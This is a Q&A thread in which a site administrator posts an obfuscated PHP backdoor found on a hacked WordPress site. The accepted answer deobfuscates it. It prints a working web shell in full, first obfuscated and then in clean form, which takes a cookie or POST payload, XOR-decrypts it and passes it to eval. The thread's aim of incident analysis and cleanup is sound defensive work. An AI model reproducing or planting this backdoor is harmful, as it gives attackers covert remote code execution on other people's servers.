Obfuscating script in WordPress

Question

One of my clients using WordPress got hacked with some malicious code like below, There are lots of file like this in all over her public_html. Though I told her to delete everything and re-upload all and update framework, plugins etc but I also want to know how can I de-obfuscate the codes

Why? Because my VPS provider told me that some hacking attempt was done using my IP (main server) to some news channel and I should stop from this kind of activities or they will simply discontinue my VPS.

So could anyone guide me to know exact code so I can analyze what kind of harms it may done.

Please note I've done jail-shell, CSF, blocking IP still it finds some way.

    <?php       
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";

$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];

$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];

$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
@$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);

$n1f035 = NULL;
$la02268b = NULL;

$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;

function n6ee1($n1f035, $f3ddc0)
{
    $kdaf = "";

    for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
    {
        for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
        {
            $kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
        }
    }

    return $kdaf;
}

function q471($n1f035, $f3ddc0)
{
    global $ea0d31;

    return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}

foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
    $n1f035 = $tf250bbad;
    $la02268b = $f3ddc0;
}

if (!$n1f035)
{
    foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
    {
        $n1f035 = $tf250bbad;
        $la02268b = $f3ddc0;
    }
}

$n1f035 = @$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
    if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
    {
        $v40207 = Array(
            $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => @$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
            $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
        );
        echo @$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
    }
    elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
    {
        eval($n1f035[$GLOBALS['efaa04'][40]]);
    }
    exit();
}

Tried to decode it with http://localhost/script.php?testGet=sss and got result

Array
(
    [_GET] => Array
        (
            [testGet] => sss
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

    [GLOBALS] => Array
 *RECURSION*
    [efaa04] => >   ,Fg7R2}Sl{a)nhO?@P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
    [m56df3a] => chr
    [ue8410] => ord
    [x6a870c8] => strlen
    [rfa65] => ini_set
    [ne6255ab9] => serialize
    [y648d6] => phpversion
    [h8f865758] => unserialize
    [j51e1d] => base64_decode
    [y8512e] => set_time_limit
    [t4193646] => q471
    [t297c] => n6ee1
    [uaf6e192f] => Array
        (
        )

    [mb1694f] => Array
        (
        )

    [n1f035] => 
    [la02268b] => 
    [ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)

got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)

I've told my client them to delete all files and re-upload from the backup. As I said I've found so many C99madshell (raw), is this kind of same in obfuscating manner.

Please note I've found a way to protect by searching malicious code and deleting them. Then run a command like chattr -R +i ./public_html then it seems stopped though i'm sure there are many backdoor scripts still inside. but if I would know exact code of above would be better.

I have no idea how to deobfuscation, but this line is the command: `eval($n1f035[$GLOBALS['efaa04'][40]]);` Try to dump it. — vaso123, May 04 '16 at 12:38
What happens if you simply delete this malicious code ? It comes back ? I got hacked last week, and they managed to make me install a fake plugin, so check your plugin list... (any "eval" is devil). You may also use "Wordfence" to protect your wp... — Random, May 04 '16 at 12:39
@lolka_bolka I've tried to dump it but it seems that particular code block is not executing.... and $n1f035 seems to have (bool) false — farness, May 04 '16 at 12:43
@Random Thanks man... yes it is coming back... i've checked access log... it seems they have this kind of script in various places... whenever i delete 1 or 2 they again upload it from another .php and all starts again... i've told them to update and install that plugins — farness, May 04 '16 at 12:49
I've also found some raw c99madshell also... is above code is simply a obfuscation of C99? — farness, May 04 '16 at 12:53
If you have been hacked, you wipe the server and you reinstall from 100% clean backups. - SO is not a security firm and it's way too broad to try and figure out what has been compromised and what hasn't, hire some one to find out or wipe the servers. — Epodax, May 04 '16 at 12:53
@Epodax boss sometimes its harder to do... but i've told that particular client to do so... but my fear is how some script can use a code and go to another client and use my main server IP (not broadcasted) to hack — farness, May 04 '16 at 12:55
@farness hackers are clever... there are many ways to do many things... So yeah, you'd better reinstall your WP from scratch, and enhance your security level... — Random, May 04 '16 at 12:58
As others says, you can not be 100% sure to clean your site 100%. Create a backup from this if you want to analyze it, but you need to make a clean install, and change your FTP password first. — vaso123, May 04 '16 at 12:59
@Epodax Thanks... I know SO is not a security firm... the reason i've come here because i think it could be a common scenario to wordpress site so any other SO member could already gone through this kind of code and simply i've a question in mind... it may seems crazy question to you i'm sorry... — farness, May 04 '16 at 13:26
I am probably too late @lolka_bolka, but I wouldn't recommend using `eval()` on malicious code. — halfer, May 04 '16 at 21:06
@halfer nobody sad to eval that code. I just sad, that is the code what evaluated, so OP need dump that variable to see what in code. — vaso123, May 05 '16 at 07:40
I think your first line could be misinterpreted in that direction, @lolka_bolka. Sometimes it is just best to say **don't actually run the `eval()` command, except in a safe/throwaway environment** `:-)`. — halfer, May 05 '16 at 08:41
@halfer nobody sad anything about run any eval. please read again. I sad to OP to dump this: `$n1f035[$GLOBALS['efaa04'][40]]` — vaso123, May 05 '16 at 08:44
@lolka_bolka: I've read it several times, thanks - can we keep the tone amenable and non-hostile please? I'll let you have the last word if you need it, but my remarks stand. They are intended as constructive. — halfer, May 05 '16 at 09:06

score 1 · Accepted Answer · answered May 05 '16 at 11:02

I agree with @Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot -from it.

I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.

First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.

Some lines like this revealed:

$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...

After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:

<?php       
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);

$n1f035 = NULL;
$la02268b = NULL;

$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;

function n6ee1($n1f035, $f3ddc0)
{
    $kdaf = "";

    for ($v40207=0; $v40207 < strlen($n1f035);)
    {
        for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
        {
            $kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
        }
    }

    return $kdaf;
}

function q471($n1f035, $f3ddc0)
{
    global $ea0d31;

    return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}

foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
    $n1f035 = $tf250bbad;
    $la02268b = $f3ddc0;
}

if (!$n1f035)
{
    foreach ($_POST as $f3ddc0=>$tf250bbad)
    {
        $n1f035 = $tf250bbad;
        $la02268b = $f3ddc0;
    }
}

$n1f035 = @unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
    if ($n1f035["a"] == "i")
    {
        $v40207 = Array(
            "pv" => @phpversion(),
            "sv" => "1.0-1",
        );
        echo @serialize($v40207);
    }
    elseif ($n1f035["a"] == "e")
    {
        eval($n1f035["d"]);
    }
    exit();
}

De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.

Fixing you client's site and keeping it safe is your homework, but I look forward for a discussion around de-obfuscation and techniques to do so.

A tip: Use find . -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed in the same day, or close dates at least, so that help to clean up the mess if you can't just wipe things clean at the moment.

Many Thanks @Paulera ... Two things i've in mind... 1. This file just a cluster, 3 or 4 of this type of file may work together 2. It may just run command of user choice from GET, POST etc... and thanks again for your tip... but if some body run a touch command to modify file timing will it still work? — farness, May 05 '16 at 11:24
I even wonder there is some client-side part involved as $_COOKIES is used. Looking forward to dig deeper into it. And yes, if you just `touch` the file, it will be retrieved by this command as recently changed. — Paulo Amaral, May 05 '16 at 12:34
I just found the same obfuscated code on my site, it's mostly cleaned up. It works as a backdoor to allow arbitrary php code to be executed. — Jacob Sánchez, May 22 '20 at 02:56

Obfuscating script in WordPress

1 Answers1